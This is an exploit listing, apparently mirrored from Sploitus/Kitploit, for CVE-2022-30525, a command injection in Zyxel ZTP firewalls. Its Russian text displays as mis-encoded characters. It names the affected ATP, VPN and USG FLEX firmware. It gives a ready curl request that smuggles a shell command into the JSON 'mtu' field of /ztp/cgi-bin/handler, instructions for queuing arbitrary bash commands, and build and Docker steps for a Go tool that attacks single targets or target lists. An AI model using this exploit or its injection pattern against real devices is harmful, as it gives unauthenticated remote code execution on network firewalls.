Sploitus

Exploit for cve-2022-30525 CVE-2022-30525

kitploit Β· 2026-09-02

Exploit Code

MARKDOWN62 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IVERESK-CVE-2022-30525
# CVE-2022-30525 ΠΎΡ‚ 1vere$k

**Rapid7** ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ»Π° ΠΈ сообщила ΠΎΠ± уязвимости, Π·Π°Ρ‚Ρ€Π°Π³ΠΈΠ²Π°ΡŽΡ‰Π΅ΠΉ мСТсСтСвыС экраны Zyxel с ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΊΠΎΠΉ Zero Touch Provisioning (ZTP), Π²ΠΊΠ»ΡŽΡ‡Π°Ρ сСрии ATP, VPN ΠΈ USG FLEX (Π²ΠΊΠ»ΡŽΡ‡Π°Ρ USG20-VPN ΠΈ USG20W-VPN). Данная ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ, идСнтифицированная ΠΊΠ°ΠΊ CVE-2022-30525, позволяСт Π½Π΅Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΌΡƒ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΌΡƒ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΡƒ Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄ ΠΎΡ‚ ΠΈΠΌΠ΅Π½ΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ nobody Π½Π° уязвимом устройствС.

Π’ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰Π΅ΠΉ Ρ‚Π°Π±Π»ΠΈΡ†Π΅ ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½Ρ‹ уязвимыС ΠΌΠΎΠ΄Π΅Π»ΠΈ ΠΈ вСрсии ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠΈ.

Уязвимая модСль USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 по ZLD5.21 Patch 1 USG20-VPN, USG20W-VPN ZLD5.10 по ZLD5.21 Patch 1 ATP 100, 200, 500, 700, 800 ZLD5.10 по ZLD5.21 Patch 1

БСрия VPN, Ρ‚Π°ΠΊΠΆΠ΅ ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°ΡŽΡ‰Π°Ρ ZTP, Π½Π΅ уязвима, ΠΏΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ Π½Π΅ ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°Π΅Ρ‚ Ρ‚Ρ€Π΅Π±ΡƒΠ΅ΠΌΡƒΡŽ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ.

УязвимыС ΠΌΠΎΠ΄Π΅Π»ΠΈ ΠΏΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Ρ‹ Π½Π΅Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΌΡƒ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΌΡƒ Π²Π½Π΅Π΄Ρ€Π΅Π½ΠΈΡŽ ΠΊΠΎΠΌΠ°Π½Π΄ Ρ‡Π΅Ρ€Π΅Π· административный HTTP-интСрфСйс. ΠšΠΎΠΌΠ°Π½Π΄Ρ‹ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡŽΡ‚ΡΡ ΠΎΡ‚ ΠΈΠΌΠ΅Π½ΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ `nobody`. Π­Ρ‚Π° ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ эксплуатируСтся Ρ‡Π΅Ρ€Π΅Π· URI `/ztp/cgi-bin/handler`.

## ΠŸΡ€ΠΈΠΌΠ΅Ρ€ Curl

root@kitploit:~
    
    
    curl -v --insecure -X POST -H "Content-Type: application/json" -d
    '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
    :"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
    https://192.168.1.1/ztp/cgi-bin/handler
    

## ИспользованиС

Π‘Π»Π΅Π΄ΡƒΠ΅Ρ‚ ΡΠΎΠ·Π΄Π°Ρ‚ΡŒ Ρ„Π°ΠΉΠ» `cmds`, Π² ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΌΠΎΠΆΠ½ΠΎ Π΄ΠΎΠ±Π°Π²Π»ΡΡ‚ΡŒ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ для выполнСния ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠΎΠΉ Π² ΡΠ»Π΅Π΄ΡƒΡŽΡ‰Π΅ΠΌ Ρ„ΠΎΡ€ΠΌΠ°Ρ‚Π΅:

root@kitploit:~
    
    
    bash -c "command#1 && command#2 && etc."
    
    НапримСр:
    bash -c "ping 8.8.8.8"
    

**Golang**

root@kitploit:~
    
    
    1. git clone https://github.com/iveresk/cve-2022-30525.git
    2. cd cve-2022-30525
    3. go build cve-2022-30525.go -o /cve-2022-30525
    4. chmod +x cve-2022-30525
    5. ./cve-2022-30525 -t <targetURL> [or <targetFile>]
    

**Dockerfile**

root@kitploit:~
    
    
    docker run -it -e INPUT_FILE=<file_name> masterrooot/cve-30525
    

Π“Π΄Π΅ INPUT_FILE β€” это Ρ†Π΅Π»Π΅Π²ΠΎΠΉ URL ΠΈΠ»ΠΈ Ρ„Π°ΠΉΠ» со списком Ρ†Π΅Π»Π΅ΠΉ.

## ΠšΠΎΠ½Ρ‚Π°ΠΊΡ‚Ρ‹

Π’Ρ‹ ΠΌΠΎΠΆΠ΅Ρ‚Π΅ ΡΠ²ΡΠ·Π°Ρ‚ΡŒΡΡ со ΠΌΠ½ΠΎΠΉ Ρ‡Π΅Ρ€Π΅Π· Keybase для получСния Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΠΉ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ.